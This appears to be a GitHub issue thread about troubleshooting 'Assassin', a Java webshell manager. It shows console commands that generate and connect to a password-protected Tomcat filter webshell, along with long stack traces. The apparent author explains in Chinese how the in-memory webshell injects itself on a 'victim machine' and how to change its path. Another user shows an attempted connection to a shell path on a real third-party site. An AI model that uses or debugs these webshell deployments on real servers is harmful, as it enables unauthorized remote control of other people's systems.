add error

[nu0l]

Assassin >new java pass2022 cookie reqEncode=base36 tamper=tomcat8_filter.txt
saved -> /Users/mac/webshell/Assassin/./2048.jsp

Assassin >add http://127.0.0.1:8090/p2022/2022.jsp pass2022 java cookie base36
send payload size: 1462 Byte
send payload size: 1461 Byte
send payload size: 1461 Byte
java.lang.IllegalArgumentException: Illegal base64 character 21
	at java.util.Base64$Decoder.decode0(Base64.java:714)
	at java.util.Base64$Decoder.decode(Base64.java:526)
	at org.b1ackc4t.sender.Sender.resDecodeFun(Sender.java:217)
	at org.b1ackc4t.sender.Sender.attack(Sender.java:249)
	at org.b1ackc4t.sender.Sender.print(Sender.java:310)
	at org.b1ackc4t.sender.Sender.testCon(Sender.java:288)
	at org.b1ackc4t.main.Console.doAdd(Console.java:77)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at org.b1ackc4t.util.Cmd.oneCmd(Cmd.java:54)
	at org.b1ackc4t.util.Cmd.cmdLoop(Cmd.java:81)
	at org.b1ackc4t.main.Main.main(Main.java:16)
java.lang.reflect.InvocationTargetException
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at org.b1ackc4t.util.Cmd.oneCmd(Cmd.java:54)
	at org.b1ackc4t.util.Cmd.cmdLoop(Cmd.java:81)
	at org.b1ackc4t.main.Main.main(Main.java:16)
Caused by: java.lang.NullPointerException
	at org.b1ackc4t.sender.Sender.testCon(Sender.java:289)
	at org.b1ackc4t.main.Console.doAdd(Console.java:77)
	... 7 more

[b1ackc4t]

这个内存马，你上传到受害机上后，需要自己访问一下，然后就会开始注入内存马，马会被写在/index.html路径下，改成add http://127.0.0.1:8090/index.html pass2022 java cookie base36即可，改路径可以直接改tomcat8_filter.txt里的/index.html

[zzgxpyy]

我看这条issue没有关，再请教一下博主，https的站点会不会有问题？另外该shell需要cookie认证，我在config.json里面已经写死了cookie，这样做是否正确，谢谢。 Assassin >add https://www.baidu.com/9659d3b4-8c31-46e4-a33e-a5da8f4f41d1_20240329104459.jsp java method=mixed resEncode=base36 send payload size: 1280 Byte javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target at sun.security.ssl.Alert.createSSLException(Unknown Source) at sun.security.ssl.TransportContext.fatal(Unknown Source) at sun.security.ssl.TransportContext.fatal(Unknown Source) at sun.security.ssl.TransportContext.fatal(Unknown Source) at sun.security.ssl.CertificateMessage$T12CertificateConsumer.checkServerCerts(Unknown Source) at sun.security.ssl.CertificateMessage$T12CertificateConsumer.onCertificate(Unknown Source) at sun.security.ssl.CertificateMessage$T12CertificateConsumer.consume(Unknown Source) at sun.security.ssl.SSLHandshake.consume(Unknown Source) at sun.security.ssl.HandshakeContext.dispatch(Unknown Source) at sun.security.ssl.HandshakeContext.dispatch(Unknown Source) at sun.security.ssl.TransportContext.dispatch(Unknown Source) at sun.security.ssl.SSLTransport.decode(Unknown Source) at sun.security.ssl.SSLSocketImpl.decode(Unknown Source) at sun.security.ssl.SSLSocketImpl.readHandshakeRecord(Unknown Source) at sun.security.ssl.SSLSocketImpl.startHandshake(Unknown Source) at sun.security.ssl.SSLSocketImpl.startHandshake(Unknown Source) at sun.net.www.protocol.https.HttpsClient.afterConnect(Unknown Source) at sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(Unknown Source) at sun.net.www.protocol.http.HttpURLConnection.getOutputStream0(Unknown Source) at sun.net.www.protocol.http.HttpURLConnection.getOutputStream(Unknown Source) at sun.net.www.protocol.https.HttpsURLConnectionImpl.getOutputStream(Unknown Source) at org.b1ackc4t.util.Utils.sendPostRequest(Utils.java:272) at org.b1ackc4t.sender.Sender.sendRequest(Sender.java:126) at org.b1ackc4t.sender.Sender.attack(Sender.java:235) at org.b1ackc4t.sender.Sender.print(Sender.java:310) at org.b1ackc4t.sender.Sender.testCon(Sender.java:288) at org.b1ackc4t.main.Console.doAdd(Console.java:77) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at org.b1ackc4t.util.Cmd.oneCmd(Cmd.java:54) at org.b1ackc4t.util.Cmd.cmdLoop(Cmd.java:81) at org.b1ackc4t.main.Main.main(Main.java:16) Caused by: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target at sun.security.validator.PKIXValidator.doBuild(Unknown Source) at sun.security.validator.PKIXValidator.engineValidate(Unknown Source) at sun.security.validator.Validator.validate(Unknown Source) at sun.security.ssl.X509TrustManagerImpl.validate(Unknown Source) at sun.security.ssl.X509TrustManagerImpl.checkTrusted(Unknown Source) at sun.security.ssl.X509TrustManagerImpl.checkServerTrusted(Unknown Source) ... 30 more Caused by: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target at sun.security.provider.certpath.SunCertPathBuilder.build(Unknown Source) at sun.security.provider.certpath.SunCertPathBuilder.engineBuild(Unknown Source) at java.security.cert.CertPathBuilder.build(Unknown Source) ... 36 more java.lang.NullPointerException at org.b1ackc4t.sender.Sender.attack(Sender.java:236) at org.b1ackc4t.sender.Sender.print(Sender.java:310) at org.b1ackc4t.sender.Sender.testCon(Sender.java:288) at org.b1ackc4t.main.Console.doAdd(Console.java:77) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at org.b1ackc4t.util.Cmd.oneCmd(Cmd.java:54) at org.b1ackc4t.util.Cmd.cmdLoop(Cmd.java:81) at org.b1ackc4t.main.Main.main(Main.java:16) java.lang.reflect.InvocationTargetException at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at org.b1ackc4t.util.Cmd.oneCmd(Cmd.java:54) at org.b1ackc4t.util.Cmd.cmdLoop(Cmd.java:81) at org.b1ackc4t.main.Main.main(Main.java:16) Caused by: java.lang.NullPointerException at org.b1ackc4t.sender.Sender.testCon(Sender.java:289) at org.b1ackc4t.main.Console.doAdd(Console.java:77) ... 7 more